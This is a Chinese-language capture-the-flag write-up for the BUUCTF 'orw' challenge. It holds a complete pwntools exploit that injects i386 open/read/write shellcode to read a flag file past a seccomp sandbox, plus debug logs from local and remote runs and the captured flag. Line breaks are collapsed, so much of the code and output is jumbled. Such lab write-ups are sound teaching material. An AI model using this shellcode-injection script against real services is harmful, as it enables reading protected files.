从零开始做题:逆向 ret2shellcode orw
1.题目信息
BUUCTF在线评测
下载orw时防病毒要关闭
2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护,并不能getshell。只能通过orw的方式拿到flag。
fd=open(‘./flag’); # 打开flag文件,得到fd
read(fd,buf,0x30); #通过fd将flag的内容读到内存中
write(1,buf,0x30); #将内存中的flag内容输出到屏幕
在相关目录里面写入以下内容
holyeyes@ubuntu:~/Re/6$ echo "flag{testtest}" >./flag
holyeyes@ubuntu:~/Re/6$
3.解题脚本
root@pwn_test1604:/ctf/work/6# ls
orw orw.i64 orw.py
root@pwn_test1604:/ctf/work/6# python
Python 2.7.12 (default, Nov 12 2018, 14:36:49)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "./flag".encode('hex')
'2e2f666c6167'
>>> "./flag\x00\x00".encode('hex')
'2e2f666c61670000'
>>>
3.1只用修改的内容
context.arch='i386'DEBUG = 1LOCAL = True
BIN ='./orw'
HOST ='node5.buuoj.cn'
PORT =25178def exploit(p):p.recv()pl = """xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80"""p.sendline(asm(pl))p.interactive()return3.2全部脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'
context.arch='i386'DEBUG = 1LOCAL = True
BIN ='./orw'
HOST ='node5.buuoj.cn'
PORT =25178def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):p.recv()pl = """xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80"""p.sendline(asm(pl))p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)3.3 运行本地
root@pwn_test1604:/ctf/work/6# tmux
root@pwn_test1604:/ctf/work/6# python orw.py
root@pwn_test1604:/ctf/work/6# python orw.py [25/25]│ f 1 f765ab23 __read_nocancel+25 [0/48]
[DEBUG] PLT 0x8048370 read │ f 2 8048582 main+58
[DEBUG] PLT 0x8048370 read │ f 3 f759d637 __libc_start_main+247
[DEBUG] PLT 0x8048380 printf │pwndbg> c
[DEBUG] PLT 0x8048390 __stack_chk_fail │Continuing.
[DEBUG] PLT 0x80483a0 __libc_start_main │
[DEBUG] PLT 0x80483b0 prctl │Program received signal SIGSEGV, Segmentation fault.
[DEBUG] PLT 0x80483c0 __gmon_start__ │0x0804a0a8 in shellcode ()
[*] '/ctf/work/6/orw' │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch: i386-32-little │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO: Partial RELRO │ EAX 0x30Stack: Canary found │ EBX 0x1NX: NX disabled │ ECX 0xffbd74b4 ◂— 0x67616c66 ('flag')PIE: No PIE (0x8048000) │ EDX 0x30RWX: Has RWX segments │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[+] Starting local process './orw': pid 179 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[*] PID: 179 │ EBP 0xffbd74c8 ◂— 0x0
[DEBUG] Wrote gdb script to '/tmp/pwn1jT2Ys.gdb' │ ESP 0xffbd74b4 ◂— 0x67616c66 ('flag')file ./orw │ EIP 0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */handle SIGALRM ignore │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base = 0x8048000 │ ► 0x804a0a8 <shellcode+72> or al, byte ptr [eax]
[*] running in new terminal: /usr/bin/gdb -q "./orw" 179 -x "/tmp/pwn1jT2Ys.gdb" │ 0x804a0aa <shellcode+74> add byte ptr [eax], al
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q "./orw" 1│ 0x804a0ac <shellcode+76> add byte ptr [eax], al
79 -x "/tmp/pwn1jT2Ys.gdb"'] │ 0x804a0ae <shellcode+78> add byte ptr [eax], al
[+] Waiting for debugger: Done
[DEBUG] Received 0x17 bytes: [0/25]│ f 1 f765ab23 __read_nocancel+25 [0/48]'Give my your shellcode:' │ f 2 8048582 main+58
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│ f 3 f759d637 __libc_start_main+247
ludes /dev/stdin │pwndbg> c
[DEBUG] Assembling │Continuing..section .shellcode,"awx" │.global _start │Program received signal SIGSEGV, Segmentation fault..global __start │0x0804a0a8 in shellcode ()_start: │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA__start: │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix │ EAX 0x30xor eax, eax │ EBX 0x1xor ebx, ebx │ ECX 0xffbd74b4 ◂— 0x67616c66 ('flag')xor ecx, ecx │ EDX 0x30xor edx, edx │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x00006761 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x6c662f2e │ EBP 0xffbd74c8 ◂— 0x0mov eax, 5 #open('./flag') │ ESP 0xffbd74b4 ◂— 0x67616c66 ('flag')mov ebx, esp │ EIP 0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */mov ecx, 0 │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0 │ ► 0x804a0a8 <shellcode+72> or al, byte ptr [eax]int 0x80 │ 0x804a0aa <shellcode+74> add byte ptr [eax], almov ebx, eax │ 0x804a0ac <shellcode+76> add byte ptr [eax], almov eax, 3 #read(fd,esp,0x30) │ 0x804a0ae <shellcode+78> add byte ptr [eax], almov ecx, esp │ 0x804a0b0 <shellcode+80> add byte ptr [eax], almov edx, 0x30 │ 0x804a0b2 <shellcode+82> add byte ptr [eax], alint 0x80 │ 0x804a0b4 <shellcode+84> add byte ptr [eax], almov eax, 4 #write(1,esp,0x30) │ 0x804a0b6 <shellcode+86> add byte ptr [eax], almov ebx, 1 │ 0x804a0b8 <shellcode+88> add byte ptr [eax], almov ecx, esp │ 0x804a0ba <shellcode+90> add byte ptr [eax], almov edx, 0x30 │ 0x804a0bc <shellcode+92> add byte ptr [eax], alint 0x80 │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp 0xffbd74b4 ◂— 0x67616c66 ('flag')
tep1 │01:0004│ 0xffbd74b8 ◂— 0x7365747b ('{tes')
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│ 0xffbd74bc ◂— 0x73657474 ('ttes')
/tmp/pwn-asm-bw_t9d/step4 │03:000c│ 0xffbd74c0 ◂— 0xf70a7d74
[DEBUG] Sent 0x49 bytes: │04:0010│ 0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│ │05:0014│ ebp 0xffbd74c8 ◂— 0x000000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│ │06:0018│ 0xffbd74cc —▸ 0xf759d637 (__libc_start_main+247) ◂— add esp, 0x1000000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│ │07:001c│ 0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 000000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│ │x1b1db0 */00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│ │──────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── 00000049 │ ► f 0 804a0a8 shellcode+72
[*] Switching to interactive mode │ f 1 67616c66
[DEBUG] Received 0x30 bytes: │ f 2 7365747b00000000 66 6c 61 67 7b 74 65 73 74 74 65 73 74 7d 0a f7 │flag│{tes│ttes│t}··│ │ f 3 7365747400000010 e0 74 bd ff 00 00 00 00 37 d6 59 f7 00 70 73 f7 │·t··│····│7·Y·│·ps·│ │ f 4 f70a7d7400000020 00 70 73 f7 00 00 00 00 37 d6 59 f7 01 00 00 00 │·ps·│····│7·Y·│····│ │ f 5 ffbd74e000000030 │ f 6 f759d637 __libc_start_main+247
flag{testtest} │Program received signal SIGSEGV (fault address 0x30)
��\xff\x00\x00\x00\x007�ps�ps�\x007�\x00$ 3.4 运行远程
root@pwn_test1604:/ctf/work/6# python orw.py 1
root@pwn_test1604:/ctf/work/6# tmux
[exited]
root@pwn_test1604:/ctf/work/6# python orw.py 1
[DEBUG] PLT 0x8048370 read
[DEBUG] PLT 0x8048380 printf
[DEBUG] PLT 0x8048390 __stack_chk_fail
[DEBUG] PLT 0x80483a0 __libc_start_main
[DEBUG] PLT 0x80483b0 prctl
[DEBUG] PLT 0x80483c0 __gmon_start__
[*] '/ctf/work/6/orw'Arch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX disabledPIE: No PIE (0x8048000)RWX: Has RWX segments
[+] Opening connection to node5.buuoj.cn on port 25178: Done
[DEBUG] Received 0x17 bytes:'Give my your shellcode:'
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,"awx".global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4
[DEBUG] Sent 0x49 bytes:00000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│00000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│00000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│00000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│00000049
[*] Switching to interactive mode
[DEBUG] Received 0x30 bytes:00000000 66 6c 61 67 7b 31 30 33 37 66 34 39 62 2d 33 30 │flag│{103│7f49│b-30│00000010 36 63 2d 34 30 34 32 2d 38 34 31 31 2d 34 38 34 │6c-4│042-│8411│-484│00000020 39 32 64 61 35 37 30 36 62 7d 0a f7 01 00 00 00 │92da│5706│b}··│····│00000030
flag{1037f49b-306c-4042-8411-48492da5706b}
�\x0[DEBUG] Received 0x2b bytes:'timeout: the monitored command dumped core\n'
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$
3.5 避坑提醒
用kali2023的虚机环境不行,要用ubuntu16.04的虚机环境就可以。
